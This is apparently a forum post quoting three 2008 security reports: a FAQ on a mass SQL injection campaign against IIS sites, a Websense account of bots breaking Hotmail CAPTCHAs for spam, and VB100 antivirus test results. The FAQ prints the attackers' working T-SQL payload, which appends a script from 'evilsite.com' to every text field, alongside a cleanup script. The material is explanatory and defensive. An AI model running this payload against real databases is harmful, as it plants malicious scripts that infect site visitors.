4. How can NoScript protect if the compromised sites are in my trusted whitelist?

“Exploits of a Mom” by xkcd

1. The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft vulnerability?

   Yes and no. Web developers (or their employers who did not mandate proper security education) are to blame for each single infection, because the SQL injection exploited to infect the web sites is possible thanks to trivial coding errors.
   That said, the attackers are targeting IIS web servers which run ASP for a reason.
   Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL Server database in a generic way, with no need of knowing the specific table and fields layouts:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This is the “secret sauce” which is allowing the attack to reach its impressive numbers, and it works exclusively against Microsoft database technology — but it’s a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful” DB technology of being used in conjunction with web servers different than IIS are very low.
   So, to recap:

   1. There’s no Microsoft-specific vulnerability involved: SQL injections can happpen (and do happen) on LAMP and other web application stacks as well.
   2. SQL injections, and therefore these infections, are caused by poor coding practices during web site development.
   3. Nonetheless, this mass automated epidemic is due to specific features of Microsoft databases, allowing the exploit code to be generic, rather than tailored for each single web site. Update: more details in this comment.

   In my previous coverage of similar incidents I also assumed a statistical/demographic reason for targeting IIS, since many ASP developers having a desktop Visual Basic background underwent a pretty traumatic migration to the web in the late 90s, and often didn’t really grow enough security awareness to develop safe internet-facing applications.

2. What should I do if I’m the administrator of an infected site?

   First of all, you should call your web developers (or even better, someone who specializes in web application security) and require a full code review to find and fix the SQL injection bugs.
   In the meanwhile you should either put your database offline or recover clean data from a backup, but until the code review is done be prepared to get compromised again. Deploying a web application firewall may mitigate the emergency, but you must understood it’s a merely temporary work-around — the solution is fixing the code (learn from the United Nations tale).
   If you’ve got no clean database backup, you could try to recover by brutally reversing the SQL attack:
   
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects a,syscolumns b where
a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor;

   This SQL procedure walks through your tables and fields, just like its evil prototype, but rather than appending the malicious JavaScript with
   
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+
''<script src=http://evilsite.com/1.js></script>''')

   it locates and removes it with
   
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),
patindex(''%tpircs<%'', reverse(['+@C+']))+7))
where ['+@C+'] like ''<script%</script>''')

   Notice that I’ve not tested my code above, and I’m just providing it as a courtesy: use it at your own risk, after doing a backup of your data.

3. What should I do as an user to protect myself?

   OK, this one is the easiest :)

4. How can NoScript protect if the compromised sites are in my trusted whitelist?

   Even if the compromised site is in your whitelist, allowed to run JavaScript, the malicious scripts are hosted on external servers controlled by the attackers (e.g. www.nihaorr1.com): therefore NoScript prevents them from being loaded and effectively defeats the attack.

[/QUOTE]

Source: http://hackademix.net/2008/04/26/mass-attack-faq/

[QUOTE]
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their recent tactics have drawn their attention towards traditional and infamous Hotmail, aka Live Hotmail services after the streamlined Live Mail Anti-CAPTCHA operations. Spammers have managed to create automated bots that are capable of not only signing up and creating random Hotmail accounts, but also use these accounts for spamming purposes from a proper Live Hotmail service. Websense predictions about this sophisticated spammer strategy at the time of Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations, and its outcomes have been factual with this attack.

Websense believes that there are four main advantages to spammers from this approach. First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to sign up. Third, the integration of Hotmail with wide range of Windows Live services. And fourth, it may be hard to keep track of them as there are millions of users worldwide using the service.
Let’s see the entire automated process in two stages.

Stage 1: Signing up and creating accounts successfully.
Part 1: Observe the bot hooking itself on to Internet Explorer browser on victims’ machine.

Part 2: Observe the set of pre-determined account names injected on to victims’ machine which bot attempts to sign-up over victims’ machine.

Part 3: The bot uses Internet Explorer browser in the background on the victims’ machine for attempting Hotmail account sign-up process.

Part 4: Observe the bot visiting Microsoft Hotmail account sign-up page, trying to grab CAPTCHA, and sending it to CAPTCHA breaking host for account creation.

Part 5: Try-break, try-break, try-break.

Part 6: Observe CAPTCHA images being collected as hidden files from victim’s machine during different account sign-up attempts.

Part 7: Unlike, Live Mail CAPTCHA break process, in this attack, the CAPTCHA breaking host communication with the victims’ machine is scrambled. It is observed that 8 characters in the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image is sent to the breaking host. The bot infected or victims’ machine descrambles it to signup the account successfully.

Part 8: Observe that account is being signed up and created successfully.

Part 9: The created account credentials are returned back to CAPTCHA breaking host.

The entire process is automated and carried out in iterative manner until all the accounts are successfully signed up in the list injected (initially) on to victims’ machine (refer to Stage 1, Figure 1.2).
Stage 2: Spamming using created accounts from a proper Hotmail Server
Once all the accounts in the list (refer to Stage 1, Figure 1.2) are signed up by the bot, they are then picked randomly and used for spamming purposes.
Part 1: Observe the login process in action.

Part 2: Login process in further progress.

Part 3: Proper login in progress over SSL page.

Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail Server page.

Part 5: Observe the bot attempting to initiate the edit process or composing a message for spamming.

Part 6: Spam message build in progress by the bot.

Part 7: Bot successfully filling in the "from email address list", “to email address“ lists , email subject, and the body to be included in the message for spamming purposes, there by competing its task.

End of message! Spam is being sent to targeted accounts.
Part 8: Finally the account is logged out to continue it similar operation with next email account.

Part 9:The entire process in action that is carried out in iterative manner to perform mass-mailing from different accounts created by the bot.

Spammers finally have success advertising their product.

Observations:
Stage 1: One in every 8 to 10 attempts to signup a hotmail account are successful. Hence success rate approximately ranges between 10 to 15%.
Stage 2: Spam campagins from one Hotmail account is sent to multiple accounts in CC and BCC list at a time. The same Hotmail account (or “from account/ address”) is not repeatedly used for sending spam campaigns continuously. They are changed in timely fashion by the bot. The same is the case with targeted accounts (or “to account(s)/ addresses) for spamming.
Additional Information:
It is observed that unlike Live Mail Anti-CAPTCHA and Gmail Anti-CAPTCHA operations in the past, the current attack is aggressive and instantaneous in terms of CAPTCHA breaking host turn-around time.
In the current attack, the response time of CAPTCHA breaking host after grabbing a CAPTCHA image from a victims’ machine, analyzing it, and responding back to victims’ machine with corresponding CAPTCHA code is relatively lower when compared to previous attacks.
Note 1: It is observed that the total response time for CAPTCHA breaking on the average is only about 6 seconds*.

Note 2: The timing on the request/response in this current attack clearly indicates the possibility of an automated system at the spammers’ end performing the Anti-CAPTCHA operation.
Websense believes that these accounts could be used by the spammers at any time for a variety of social-engineering attacks in future. A wide range of attacks (both manual and automated) would be possible using the same account credentials on other significant Live services integrated with Live Hotmail services offered by Microsoft Corporation, such as Live Messenger (instant messaging), Live Spaces (online storage), etc.

Note: For more information on Hotmail aka Live Hotmail and Live services, see the Hotmail, Live Hotmail and Live Mail entries on Wikipedia.
[/QUOTE]

Source: http://securitylabs.websense.com/

[QUOTE]
Researchers at Virus Bulletin have released the results of the latest VB100 computer security test, highlighting failures at a number of leading security vendors.

Products from Sophos, Trend Micro and Kaspersky were among those that failed to protect fully against a collection of outdated viruses.

The December edition of the VB100 test subjected security software to 100 Windows 2000 viruses collected from labs and websites.

"It was a shock and a concern to see such a poor performance from so many products in this latest round of testing," said John Hawes, a technical consultant at Virus Bulletin.

"It is particularly disappointing to see so many major products missing significant real-world threats."

In order to pass the test, vendors needed to identify 100 malware samples as well as avoid reporting false positives on clean samples.

Kaspersky failed the test by missing one virus from the list, while Sophos missed eight. Trend Micro missed four virus samples, failing VB100 certification for the fourth time in five tests.

Trend Micro products had passed 13 consecutive VB100 tests. The company declined to comment on the results.

Other notable security products failing the VB100 test included PC Tools' Spyware Doctor, which recorded two false positives, and Norman Virus Control, which missed 14 samples and recorded six false positives.

Companies whose products passed the test included BitDefender, Symantec, McAfee, Sunbelt and Microsoft.
[/QUOTE]

Source: http://www.vnunet.com